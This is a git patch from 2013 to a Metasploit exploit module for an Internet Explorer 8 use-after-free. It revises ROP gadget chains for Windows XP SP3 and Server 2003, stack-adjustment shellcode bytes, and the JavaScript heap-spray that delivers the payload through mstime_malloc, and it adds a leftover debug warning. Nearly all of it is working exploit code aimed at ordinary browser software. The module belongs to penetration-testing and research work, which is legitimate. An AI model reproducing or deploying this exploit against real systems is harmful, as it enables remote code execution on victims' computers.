From 075f6e8d4521070c6050605e53eee11849e4e5e5 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 8 May 2013 15:42:45 -0500
Subject: [PATCH] Updates ROP chain and mstime_malloc usage

---
 .../windows/browser/ie_cgenericelement_uaf.rb | 96 ++++++-------------
 1 file changed, 29 insertions(+), 67 deletions(-)

diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
index e4b6c7ad0e..b6df709b68 100644
--- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -1,5 +1,4 @@
 ##
-#
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
@@ -83,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def get_target(agent)
-		#If the user is already specified by the user, we'll just use that
 		return target if target.name != 'Automatic'
 
 		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
@@ -115,25 +113,16 @@ class Metasploit3 < Msf::Exploit::Remote
 		return nil
 	end
 
-	def junk(n=4)
-		rand_text_alpha(n).unpack("V")[0].to_i
-	end
-
-	def nop
-		make_nops(4).unpack("V")[0].to_i
-	end
-
 	def get_payload(t, cli)
-		code = payload.encoded
-
-		# No rop. Just return the payload.
-		return code if t['Rop'].nil?
+		rop_payload = ''
 
 		case t['Rop']
 		when :msvcrt
-			case t.name
-			when 'IE 8 on Windows XP SP3'
-				rop_gadgets =
+			algin  = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+			chain = ''
+
+			if t.name == 'IE 8 on Windows XP SP3'
+				chain =
 				[
 					0x77c1e844, # POP EBP # RETN [msvcrt.dll]
 					0x77c1e844, # skip 4 bytes [msvcrt.dll]
@@ -158,8 +147,12 @@ class Metasploit3 < Msf::Exploit::Remote
 					0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
 					0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
 				].pack("V*")
-			when 'IE 8 on Windows Server 2003'
-				rop_gadgets =
+
+			elsif t.name == 'IE 8 on Windows Server 2003'
+				junk = rand_text_alpha(4).unpack("V")[0].to_i
+				nop  = make_nops(4).unpack("V")[0].to_i
+
+				chain =
 				[
 					0x77bb2563, # POP EAX # RETN
 					0x77ba1114, # <- *&VirtualProtect()
@@ -187,40 +180,16 @@ class Metasploit3 < Msf::Exploit::Remote
 					0x77be6591  # PUSHAD # ADD AL,0EF # RETN
 				].pack("V*")
 			end
-		else
-			rop_gadgets =
-			[
-				0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
-				0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
-				0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
-				0x7c3415a2, # JMP [EAX] [msvcr71.dll]
-				0xffffffff,
-				0x7c376402, # skip 4 bytes [msvcr71.dll]
-				0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
-				0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
-				0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
-				0x7c344f87, # POP EDX # RETN [msvcr71.dll]
-				0xffffffc0, # Value to negate, will become 0x00000040
-				0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
-				0x7c34d201, # POP ECX # RETN [msvcr71.dll]
-				0x7c38b001, # &Writable location [msvcr71.dll]
-				0x7c347f97, # POP EAX # RETN [msvcr71.dll]
-				0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
-				0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
-				0x7c345c30  # ptr to 'push esp #  ret ' [msvcr71.dll]
-				# rop chain generated with mona.py
-			].pack("V*")
-		end
 
-		rop_payload = rop_gadgets
-		case t['Rop']
-		when :msvcrt
-			rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+			rop_payload = chain + algin + payload.encoded
+
 		else
-			rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
+			code  = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
+			code << payload.encoded
+			code << rand_text_alpha(12000)
+
+			rop_payload = generate_rop_payload('java', code)
 		end
-		rop_payload << code
-		rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
 
 		return rop_payload
 	end
@@ -278,28 +247,22 @@ class Metasploit3 < Msf::Exploit::Remote
 
 			CollectGarbage();
 
-			hd = unescape("ABCD");
+			sparkle = unescape("ABCD");
 			for (i=0; i < 2; i++) {
-				unicorn += unescape("ABCD");
+				sparkle += unescape("ABCD");
 			}
-			unicorn += unescape("AB");
+			sparkle += unescape("AB");
+			sparkle += unescape("#{js_payload}");
 
-			unicorn += unescape("#{js_payload}");
-
-			animvalues = unescape("#{align_esp}");
+			magenta = unescape("#{align_esp}");
 
 			for (i=0; i < 0x70/4; i++) {
-				if (i == 0x70/4-1) {
-					animvalues += unescape("#{xchg_esp}");
-				}
-				else {
-					animvalues += unescape("#{align_esp}");
-				}
+				if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
+				else               { magenta += unescape("#{align_esp}"); }
 			}
 
-			animvalues += unicorn;
-
-			mstime_malloc({shellcode:animvalues, heapBlockSize:0x38, objId:"myanim"});
+			magenta += sparkle;
+			mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
 		}
 
 		</script>
@@ -315,12 +278,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def on_request_uri(cli, request)
+		print_warning("test!!!!!!!!!!!!!")
 		agent = request.headers['User-Agent']
 		uri   = request.uri
 		print_status("Requesting: #{uri}")
 
 		my_target = get_target(agent)
-		# Avoid the attack if no suitable target found
 		if my_target.nil?
 			print_error("Browser not supported, sending 404: #{agent}")
 			send_not_found(cli)
@@ -334,4 +297,3 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 end
-